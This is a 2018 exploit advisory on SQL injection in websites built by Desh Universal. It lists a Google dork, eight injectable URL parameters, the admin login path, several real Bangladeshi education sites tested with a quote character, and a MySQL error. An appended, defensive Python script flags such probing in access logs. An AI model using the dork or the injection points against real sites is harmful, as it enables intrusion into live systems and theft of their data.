#################################################################################################
# Exploit Title : Developed by Desh Universal (Pvt.) Limited SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/09/2018
# Vendor Homepage : deshuniversal.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Developed by Desh Universal (Pvt.) Limited.''
# Exploits :
/teacher?page=[SQL Injection]
/teacher?page=[ID-NUMBER]&dept_id=&cat_id=[SQL Injection]
/event-details?events-id=[SQL Injection]
/notice-details?nid=[SQL Injection]
/messages?messageid=[SQL Injection]
/text-file?file_id=[SQL Injection]
/details?id=[SQL Injection]
/program-subjects?programID=[SQL Injection]
# Admin Control Panel Path => /login
It redirects to another link for login with a username and password.
#################################################################################################
# Example Site =>
rcpsc.edu.bd/teacher?page=4&dept_id=&cat_id=1%27 => [ Proof of Concept ] => archive.is/LIcq4
acps.edu.bd/messages?mid=101%27
cpscm.edu.bd/details?id=5%27
dcc.edu.bd/notice-details?nid=666%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '' ORDER BY dupl_teachers.seniority ASC LIMIT 30,10' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
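
Added example (not part of the original advisory): a log check that flags requests to the endpoints listed above when one of the named parameters holds something other than an integer. It assumes these parameters are plain numeric IDs, as every sample value on the page suggests, and that the server writes combined-format access logs; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path -> query parameters named in the advisory. Assumption: each carries a
# plain integer ID (every sample value on the page is a small number).
ID_PARAMS = {
    "/teacher": {"page", "dept_id", "cat_id"},
    "/event-details": {"events-id"},
    "/notice-details": {"nid"},
    "/messages": {"messageid", "mid"},
    "/text-file": {"file_id"},
    "/details": {"id"},
    "/program-subjects": {"programID"},
}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")  # empty values are allowed (dept_id= in the advisory)

def suspicious_params(target):
    """Return [(param, decoded_value)] for listed ID params that are not integers."""
    parts = urlsplit(target)
    wanted = ID_PARAMS.get(parts.path.rstrip("/") or "/")
    if not wanted:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in wanted and value and not INT_RE.fullmatch(value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Yield (line_number, path_and_query, hits) for each flagged access-log line."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, match.group(1), hits

# Constructed sample lines in combined log format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2018:10:01:12 +0600] "GET /teacher?page=4&dept_id=&cat_id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Sep/2018:10:02:40 +0600] "GET /teacher?page=4&dept_id=&cat_id=1%27 HTTP/1.1" 500 312',
    '198.51.100.4 - - [04/Sep/2018:10:03:05 +0600] "GET /notice-details?nid=666 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [04/Sep/2018:10:03:09 +0600] "GET /details?id=5%27 HTTP/1.1" 500 298',
]

if __name__ == "__main__":
    for number, target, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {target} -> {hits}")
```

The check only surfaces probing in logs; the underlying fix is to bind these values as integer parameters in the query instead of concatenating them into the SQL string.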